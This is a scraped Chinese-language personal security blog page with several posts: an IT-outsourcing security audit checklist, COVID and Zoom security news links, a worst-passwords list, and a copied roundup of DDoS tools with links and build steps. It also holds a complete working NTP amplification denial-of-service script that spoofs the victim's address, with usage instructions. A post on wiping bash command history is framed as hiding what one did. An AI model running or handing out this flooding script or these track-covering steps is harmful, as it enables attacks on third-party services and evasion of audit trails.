-->

whaust

2020年4月8日 星期三

資訊委外廠商查核項目表



查核項目
查核內容
查核結果
說明
符合
不符合
不適用
1.資通安全政策之推動及目標訂定
1.1      是否定義符合組織需要之資通安全政策及目標?
已訂定資通安全政策及目標。
1.2      織是否訂定資通安全政策及目標?
政策及目標符合機關之需求。
1.3      組織之資通安全政策文件是否由管理階層核准並正式發布且轉知所有同仁?
依規定按時進行教育訓練之宣達。
1.4      組織是否對資通安全政策、目標之適切性及有效性,定期作必要之審查及調整?
定期進行政策及目標之檢視、調整。
1.5      是否隨時公告資通安全相關訊息?
將資安訊息公告於布告欄。
2.設置資通安全推動組織
2.1      是否指定適當權責之高階主管負責資通安全管理之協調、推動及督導等事項?
指派副首長擔任資安長。
2.2      是否指定專人或專責單位,負責辦理資通安全政策、計畫、措施之研議,資料、資通系統之使用管理及保護,資安稽核等資安工作事項?
有設置內部資通安全推動小組,並制訂相關之權責分工。
2.3      是否訂定組織之資通安全責任分工?
機關內部訂有資安責任分工組織。
3.配置適當之資通安全專業人員及適當之資源
3.1      是否訂定人員之安全評估措施?
有訂定人員錄用之安全評估措施
3.2      是否符合組織之需求配置專業資安人力?
機關依規定配置資安人員2人。
3.3      是否具備相關專業資安證照或認證?
專業人員具備ISO27001之證照
3.4      是否配置適當之資源?
機關投入足夠資安資源。
4.資訊及資通系統之盤點及風險評估
4.1      是否建立資訊及資通系統資產目錄,並隨時維護更新?
依規定建置資產目錄,並定時盤點。
4.2      各項資產是否有明確之管理者及使用者?
資產依規定指定管理者及使用者。
4.3      是否定有資訊、資通系統分級與處理之相關規範?
資訊訂有分級處理之作業規範。
4.4      是否進行資訊、資通系統之風險評估,並採取相應之控制措施?
已進行風險評估及擬定相應之控制措施。
5.資通安全管理措施之實施情況
5.1      人員進入重要實體區域是否訂有安全控制措施?
機房訂有門禁管制措施。
5.2      重要實體區域的進出權利是否定期審查並更新?
定期更新。
5.3      電腦機房及重要地區,對於進出人員是否作必要之限制及監督其活動?
對於進出人員監督其活動。
5.4      電腦機房操作人員是否隨時注意環境監控系統,掌握機房溫度及溼度狀況?
按時檢測機房物理面之情況。
5.5      各項安全設備是否定期檢查?同仁有否施予適當的安全設備使用訓練?
依規定定期檢查並按時提供同仁安全設備之使用運練。
5.6      第三方支援服務人員進入重要實體區域是否經過授權並陪同或監視?
陪同或監視第三方支援人員。
5.7      重要資訊處理設施是否有特別保護機制?
對於核心系統主機設置特別保護機制。
5.8      重要資通設備之設置地點是否檢查及評估火、煙、水、震動、化學效應、電力供應、電磁幅射或民間暴動等可能對設備之危害?
定期檢查物理面之風險。
5.9      電源之供應及備援電源是否作安全上考量?
有設置備用電源。
5.10  通訊線路及電纜線是否作安全保護措施?
電纜線定期檢修,並設有安全保護措施。
5.11  設備是否定期維護,以確保其可用性及完整性?
設備按期維護。
5.12  設備送場外維修,對於儲存資訊是否訂有安全保護措施?
訂有相關之保護措施。
5.13  可攜式的電腦設備是否訂有嚴謹的保護措施(如設通行碼、檔案加密、專人看管)
攜帶式設備訂有保護措施。
5.14  設備報廢前是否先將機密性、敏感性資料及版權軟體移除或覆寫?
設備報廢前均有進行資料清除程序。
5.15  公文及儲存媒體在不使用或不在班時是否妥為存放?機密性、敏感性資訊是否妥為收存?
人員下班後將機敏性公文妥善存放。
5.16  系統開發測試及正式作業是否區隔在不同之作業環境?
系統開發測試與正式作業區隔。
5.17  是否全面使用防毒軟體並即時更新病毒碼?
按時更新病毒碼。
5.18  是否定期對電腦系統及資料儲存媒體進行病毒掃瞄?
定期進行相關系統之病毒掃瞄。
5.19  是否定期執行各項系統漏洞修補程式?
定期進行漏洞修補。
5.20  是否要求電子郵件附件及下載檔案在使用前需檢查有無惡意軟體(含病毒、木馬或後門等程式)
系統設有檢查之機制。
5.21  重要的資料及軟體是否定期作備份處理?
有定期做備份處理。
5.22  備份資料是否定期回復測試,以確保備份資料之有效性?
備份資料均有測試。
5.23  對於敏感性、機密性資訊之傳送是否採取資料加密等保護措施?
均有設加密之保護措施。
5.24  是否訂定可攜式媒體(磁帶、磁片、光碟片、隨身碟及報表等)管理程序?
訂有可攜式媒體之管理程序。
5.25  是否訂定使用者存取權限註冊及註銷之作業程序?
訂有使用者存取權限註冊及註銷之作業程序。
5.26  使用者存取權限是否定期檢查(建議每六個月一次)或在權限變更後立即複檢?
定期檢視使用者存取權限。
5.27  通行碼長度是否超過6個字元(建議以8位或以上為宜)
通行碼符合規定。
5.28  通行碼是否規定需有大小寫字母、數字及符號組成?
通行碼符合規定。
5.29  是否依網路型態(InternetIntranetExtranet)訂定適當的存取權限管理方式?
依規定訂定適當之存取權限。
5.30  對於重要特定網路服務,是否作必要之控制措施,如身份鑑別、資料加密或網路連線控制?
對於特定網路有訂定相關之控制措施。
5.31  是否訂定行動式電腦設備之管理政策(如實體保護、存取控制、使用之密碼技術、備份及病毒防治要求)
有針對行動式電腦訂定管理政策。
5.32  重要系統是否使用憑證作為身份認證?
針對重要系統設有身份認證。
5.33  系統變更後其相關控管措施與程序是否檢查仍然有效?
系統更新後相關措施仍有效。
5.34  是否可及時取得系統弱點的資訊並作風險評估及採取必要措施?
可即時取得系統弱點並採取應變措施。
6.訂定資通安全事件通報及應變之程序及機制
5.1      是否建立資通安全事件發生之通報應變程序?
有訂定通報應變程序。
5.2      機關同仁及外部使用者是否知悉資通安全事件通報應變程序並依規定辦理?
同仁及委外廠商均知悉通報應變程序,並定期宣導。
5.3      是否留有資通安全事件處理之記錄文件,記錄中並有改善措施?
有留存相關紀錄。
7.定期辦理資通安全認知宣導及教育訓練
7.1      是否定期辦理資通安全認知宣導?
有定期辦理宣導。
7.2      是否對同仁進行資安評量?
按期進行資安評量。
7.3      同仁是否依層級定期舉辦資通安全教育訓練?
有定期辦理教育訓練。
7.4      同仁是否瞭解單位之資通安全政策、目標及應負之責任?
同仁均瞭解單位之資通安全政策及目標。
8.資通安全維護計畫實施情形之精進改善機制
8.1      是否設有稽核機制?
訂有稽核機制。
8.2      是否定有年度稽核計畫?
有訂定年度稽核計畫。
8.3      是否定期執行稽核?
有按期執行稽核。
8.4      是否改正稽核之缺失?
訂有稽核後之缺失改正措施。
9.資通安全維護計畫及實施情形之績效管考機制
10.1  是否訂定安全維護計畫持續改善機制?
有訂定持續改善措施。
10.2  是否追蹤過去缺失之改善情形?
有追蹤缺失改善之情形。
10.3  是否定期召開持續改善之管理審查會議?
定期召開管理審查會議。

註:陳核層級請單位依需求調整

承辦人:               單位主管:機關首長:

COVID-19 related news

新冠肺炎肆虐,客戶與主管單位要求規劃採取『居家辦公、異地分流』以避免接觸與感染機會可是您有提供『便利、安全與被稽核的 異地分流、居家辦公的環境』?

【金融業抗疫對策:金管會】

金融業紛紛啟動緊急應變預定對策,保險業更分6級因應武漢肺炎因為駭客入侵事件頻傳,主管機關對於銀行在遠端連線工作的機制,要求特別嚴格。除了連線必須有控管機制,而且人員須先造冊核可之外,所有連線作業都需要留下軌跡,事後主管必須檢閱。

中研院4人確診 300人在家辦公【新聞來源 中國時報 2020/03/23


疫情蔓延 谷歌、臉書擴大實施遠距工作【新聞來源 工商時報 數位編輯 2020.03.06


《金融》疫情升級,13家國銀啟動異地辦公【2020.02.24中央社】


同事確診新冠肺炎!新加坡星展銀行300員工急撤離大樓 【新聞來源2020-02-12 15:14 經濟日報】


防新冠肺炎疫情擴散 日本資生堂今起8000人在家上班2020-02-26 10:11 聯合新聞網】

2020年4月7日 星期二

Zoom Issue

Zoom Lets Attackers Steal Windows Credentials, Run Programs via UNC Links

pwnsdx/converter.js

Zoom爆資安疑慮 公務部門禁用
https://news.ltn.com.tw/news/politics/paper/1364183

視頻會議軟體Zoom引發安全憂慮 或向中共傳輸信息
https://www.secretchina.com/news/b5/2020/04/04/928592.html

Zoom 送中?非標準加密,可向中國傳送加密訊息、密鑰
https://www.inside.com.tw/article/19409-zoom-calls-routed-china

Zoom又被抓包?宣稱用256位元的AES加密金鑰,但其實只有128位元
https://www.ithome.com.tw/news/136762

Zoom 資安疑慮外,又被證實連線資料可能被送往中國
http://technews.tw/2020/04/05/zoom-it-is-confirmed-that-the-connection-information-may-be-sent-to-china/

Zoom被爆疑向北京傳輸加密訊​息 中國創辦人道歉稱將改進
https://m.ltn.com.tw/news/world/breakingnews/3123301

認將用戶數據傳中國 Zoom稱失誤
https://bit.ly/3bY2Fnr

Zoom資安再出包?資料「誤傳」往中國伺服器袁征這樣回 學者提醒:要小心
https://cnews.com.tw/137200406a02/

Zoom Recordings Exposed
https://divvycloud.com/zoom-recordings-exposed/

Zoom admits some calls were routed through China by mistake
https://techcrunch.com/2020/04/03/zoom-calls-routed-china/

除了「Zoom-Bombing」攻擊風險外,Zoom 再爆駭客可竊取使用者 Windows 憑證漏洞
https://technews.tw/2020/04/02/attackers-can-use-zoom-to-steal-users-windows-credentials-with-no-warning/

NTP 放大攻擊

Environment : 

Python 2.7
scapy 2.3.1  : pip install scapy==2.3.1

Download Source

https://github.com/vpnguy-zz/ntpdos.git


from scapy.all import *
import sys
import threading
import time
import random # For Random source port
#NTP Amp DOS attack

#usage ntpdos.py <target ip> <ntpserver list> <number of threads> ex: ntpdos.py 1.2.3.4 file.txt 10
#FOR USE ON YOUR OWN NETWORK ONLY

#Random source port added by JDMoore0883

#packet sender
def deny():
 #Import globals to function
 global ntplist
 global currentserver
 global data
 global target
 ntpserver = ntplist[currentserver] #Get new server
 currentserver = currentserver + 1 #Increment for next 
 packet = IP(dst=ntpserver,src=target)/UDP(sport=random.randint(2000,65533),dport=123)/Raw(load=data) #BUILD IT
 send(packet,loop=1) #SEND IT

#So I dont have to have the same stuff twice
def printhelp():
 print "NTP Amplification DOS Attack"
 print "By DaRkReD"
 print "Usage ntpdos.py <target ip> <ntpserver list> <number of threads>"
 print "ex: ex: ntpdos.py 1.2.3.4 file.txt 10"
 print "NTP serverlist file should contain one IP per line"
 print "MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS"
 exit(0)

try:
 if len(sys.argv) < 4:
  printhelp()
 #Fetch Args
 target = sys.argv[1]

 #Help out idiots
 if target in ("help","-h","h","?","--h","--help","/?"):
  printhelp()

 ntpserverfile = sys.argv[2]
 numberthreads = int(sys.argv[3])
 #System for accepting bulk input
 ntplist = []
 currentserver = 0
 with open(ntpserverfile) as f:
     ntplist = f.readlines()

 #Make sure we dont out of bounds
 if  numberthreads > int(len(ntplist)):
  print "Attack Aborted: More threads than servers"
  print "Next time dont create more threads than servers"
  exit(0)

 #Magic Packet aka NTP v2 Monlist Packet
 data = "\x17\x00\x03\x2a" + "\x00" * 4

 #Hold our threads
 threads = []
 print "Starting to flood: "+ target + " using NTP list: " + ntpserverfile + " With " + str(numberthreads) + " threads"
 print "Use CTRL+C to stop attack"

 #Thread spawner
 for n in range(numberthreads):
     thread = threading.Thread(target=deny)
     thread.daemon = True
     thread.start()

     threads.append(thread)

 #In progress!
 print "Sending..."

 #Keep alive so ctrl+c still kills all them threads
 while True:
  time.sleep(1)
except KeyboardInterrupt:
 print("Script Stopped [ctrl + c]... Shutting down")
 # Script ends here

Prepare ntp-server.txt

collect the list from ..... <you know that>

Attack

./ntpdos.py <IP> ntp-server.txt <session>




2020年4月2日 星期四

刪除Linux Bash history 指令操作歷史紀錄

難免不想讓人知道你操作過那些指令

在 Linux Bash 下過的指令紀錄,可用 history 指令查詢。
下過的指令,會先存放在 buffer,退出 bash 時,再寫入記錄檔。因此,之後登入時,也能看到之前下過的指令。

history操作紀錄相關的幾個環境變數:
  • 操作歷史紀錄,儲存的檔案位置。(操作歷史紀錄檔)(.bash_history)
    # echo $HISTFILE
    /root/.bash_history
  • 操作歷史紀錄檔,最多儲存幾筆。
    # echo $HISTFILESIZE
    1000
  • history 最多列出幾筆(在記憶體中存放的筆數)
    # echo $HISTSIZE
    1000


刪除全部的操作紀錄:
# history -c
# history -w
說明:「history -c」會刪除「下 history 指令時,列出的操作紀錄」, 但不會刪除「.bash_history」(HISTFILE)的檔案內容,為避免重新登入後,又讀取「.bash_history」(HISTFILE)的檔案內容, 所以須再用「history -w」寫入目前已清空的操作紀錄。


只刪除這次登入後的操作紀錄:
  • 方法一:清空 HISTFILE 變數內容,則登出時,不會將本次操作紀錄儲存到 HISTFILE 設定的檔案。
    # unset HISTFILE
  • 方法二:將 HISTSIZE 設為0,下「history」指令時,也不會列出指令(記憶體中沒存放指令紀錄?),則登出時,不會更新記錄檔內容(?)。
    (註:參考資料是寫會刪除全部紀錄,但我測試是只有不會儲存本次操作紀錄)
    # HISTSIZE=0
  • 方法三:強制刪除本次登入 Bash 的 PID,則本次操作紀錄,不會儲存到記錄檔。
    # kill -9 $$

說明:
  • 「$$」的變數內容是本次登入的 PID,一般和「$BASHPID」一樣,但有時不同(在 subshell 中會不同)。
    # echo $$
    4308
    # echo $BASHPID
    4308
    # (echo $BASHPID)
    4376
    # (echo $BASHPID $$)
    4377 4308
  • 「subshell」不等於「Bash 裡面再執行一次 Bash」。
    「subshell」,可以訪問父 Shell 的任何變數。
    「Bash 裡面再執行一次 Bash」,只能訪問父 Shell 的環境變數。
    TestAA:自訂的變數
    HISTSIZE:環境變數
    # TestAA=10
    # HISTSIZE=3
    # echo $TestAA
    10
    # echo $HISTSIZE
    3
    # (echo $TestAA)
    10
    # (echo $HISTSIZE)
    3
    # bash
    # echo $TestAA
    (無資料)
    # echo $HISTSIZE
    3

Source : https://xyz.cinc.biz/2017/08/linux-bash-history-clear.html

2019 最糟密碼

快看看你的密碼有沒有上榜
Quickly see if your password is on the list
パスワードがリストにあるかどうかを素早く確認する
Быстро проверьте, указан ли ваш пароль
ตรวจสอบอย่างรวดเร็วว่ารหัสผ่านของคุณอยู่ในรายการ

排名 最糟密碼 說明
1 123456  2018 蟬聯
2 123456789 up 1
3 qwerty Up 6
4 password Down 2
5 1234567 Up 2
6 12345678 Down 2
7 12345 Down 2
8 iloveyou Up 2
9 111111 Down 3
10 123123 Up 7
11 abc123 Up 4
12 qwerty123 Up 13
13 1q2w3e4r New
14 admin Down 2
15 qwertyuiop New
16 654321 Up 3
17 555555 New
18 lovely New
19 7777777 New
20 welcome Down 7
21 888888 New
22 princess Down 11
23 dragon New
24 password1 Unchanged
25 123qwe New
26 666666 新上榜
27 1qaz2wsx 新上榜
28 333333 新上榜
29 michael 新上榜
30 sunshine 新上榜
31 liverpool 新上榜
32 777777 新上榜
33 1q2w3e4r5t 新上榜
34 donald 新上榜
35 freedom 新上榜
36 football 新上榜
37 charlie 新上榜
38 letmein 新上榜
39 !@#$%^&* 新上榜
40 secret 新上榜
41 aa123456 新上榜
42 987654321 新上榜
43 zxcvbnm 新上榜
44 passw0rd 新上榜
45 bailey 新上榜
46 nothing 新上榜
47 shadow 新上榜
48 121212 新上榜
49 biteme 新上榜
50 ginger 新上榜

2020年4月1日 星期三

10 BEST DDoS Attack Tools in 2020 [Free/Paid]

10 BEST DDoS Attack Tools in 2020 [Free/Paid]

DoS (Denial of Service) is an attack used to deny legitimate user's access to a resource such as accessing a website, network, emails, etc. Distributed Denial of Service (DDoS) is a type of DoS attack that is performed by a number of compromised machines that all target the same victim. It floods the computer network with data packets.

There are numerous DDoS attack tools that can create a distributed denial-of-service attack against a target server. Following is a handpicked list of DDoS Attack Tools, with their popular features and website links. The list contains both open source(free) and commercial(paid) software.

1) LOIC (Low Orbit ION cannon)

LOIC (Low Orbit ION cannon) is open-source software use for DDoS attack. This tool is written in C#. This tool sends HTTP, TCP, and UDP requests to the server.
Features:
  • LOIC helps you to test the performance of the network.
  • It enables you to create a DDoS attack against any site that they control.
  • Loic does not hide an IP address even if the proxy server is not working.
  • It helps you to perform stress testing to verify the stability of the system.
  • This software can be used to identify programs that may be used by hackers to attack a computer network.
Link: https://sourceforge.net/projects/loic/

2) HOIC (High Orbit ION cannon)

High Orbit Ion Cannon is a free denial-of-service attack tool. It is designed to attack more than one URLs at the same time. This tool helps you to launch DDoS attacks using HTTP (Hypertext Transfer Protocol).
Features:
  • You can attack up to 256 websites at once.
  • It has a counter that helps you to measure the output.
  • It can be ported over to Linux or Mac OS.
  • You can choose the number of threads in the current attack.
  • HOIC enables you to control attacks with low, medium, and high settings.
Link: https://sourceforge.net/projects/highorbitioncannon/

3) HTTP Unbearable Load King (HULK)

HTTP Unbearable Load King (HULK) is a web server DDoS tool. It is specifically used to generate volumes of traffic at a webserver.
Features:
  • It can bypass the cache server.
  • This tool helps you to generate unique network traffic.
  • HTTP Unbearable Load King (HULK) can be easily used for research purposes.
Link: https://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html

4) DDoSIM (DDoS Simulator)

DDoSIM (DDoS Simulator) is a tool that is used to create a distributed denial-of-service attack against a target server. It is written in C++ and can be used on the Linux operating system.
Features:
  • This tool indicates the capacity of the server to handle application-specific DDOS attacks.
  • It enables you to create full TCP connections to the target server.
  • DDoSIM provides numerous options to perform a network attack.
  • TCP connections can be flooded on a random network port.
  • Configuration & Installation
    • 1. ./configure
    • 2. make
    • 3. make install
    • sudo install apt-get install libnet-dev (if show Error you need libnet0)
      • sudo apt install autoconf automake libtool
      • git clone https://github.com/libnet/libnet.git
      • ./autogen.sh
      • ./configure && make
      • sudo make install 
      • (未完代續)
    • sudo install apt-get install libpcap (if show Error you need libpcap)

Link: https://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/

5) PyLoris

PyLoris is a software product for testing network vulnerability by performing Distributed Denial of Service (DDoS) attack online. It helps you to control poorly manage concurrent connections.
Features:
  • It provides easy to use GUI (Graphic User Interface).
  • This tool enables you to attack using HTTP request headers.
  • It has the latest codebase (collection of source code used to build a particular software system).
  • You can run PyLoris using Python script.
  • This tool supports Windows, Mac OS, and Linux.
  • It provides an advanced option having a limitation of 50 threads, each with a total of 10 connections.
Link: https://motoma.io/pyloris/

6) OWASP HTTP POST

The OWASP (Open Web Application Security Project) HTTP Post software enables you to test your web applications for network performance. It helps you to conduct denial of service from a single machine.
Features:
  • It allows you to distribute and transmit the tool with others.
  • You can freely use this tool for commercial purposes.
  • OWASP HTTP POST helps you to share the result under the license it provides.
  • This tool enables you to test against the application layer attacks.
  • It helps you to decide the server capacity.
Link: https://www.owasp.org/index.php/OWASP_HTTP_Post_Tool

7) RUDY

RUDY is a short form of R-U-Dead-Yet. It helps you to perform the DDoS attack with ease. It targets cloud applications by starvation of sessions available on the web server.
Features:
  • This is a simple and easy tool.
  • It automatically browses the target website and detects embedded web forms.
  • R-U-Dead-Yet enables you to conduct HTTP DDoS attack using long-form field submission.
  • This tool provides an interactive console menu.
  • It automatically identifies form fields for data submission.
Link: https://sourceforge.net/projects/r-u-dead-yet/

8) Tor's Hammer

Tor'shammer is an application-layer DDoS program. You can use this tool to target web applications and a web server. It performs browser-based internet request that is used to load web pages.
Features:
  • It allows you to create rich text markup using Markdown (a plain text formatting syntax tool).
  • Tor's Hammer automatically converts the URL into links.
  • This app uses web server resources by creating a vast number of network connections.
  • You can quickly link other artifacts in your project.
  • It holds HTTP POST requests and connections for 1000 to 30000 seconds.
Link: https://sourceforge.net/projects/torshammer/

9) DAVOSET

DAVOSET is software for committing DDOS attacks via abuse of any website functionality. This command line tool helps you to commit distributed denial of service attacks without any hassle.
Features:
  • It provides support for cookies.
  • This tool provides a command-line interface to perform an attack.
  • DAVOSET can also help you to hit attack using XML external entities (attack against an app that parses XML input).
Link: https://packetstormsecurity.com/files/123084/DAVOSET-1.1.3.html

10) GoldenEye

GoldenEye tool conducts a DDoS attack by sending an HTTP request to the server. It utilizes a KeepAlive message paired with cache-control options to persist socket connection busting.
Features:
  • This tool consumes all the HTTP/S sockets on the application server for the DDoS attack.
  • It is easy to use app written in Python.
  • Arbitrary creation of user agents is possible.
  • It randomizes GET, POST to get the mixed traffic.

Source : https://www.guru99.com/ddos-attack-tools.html

Popular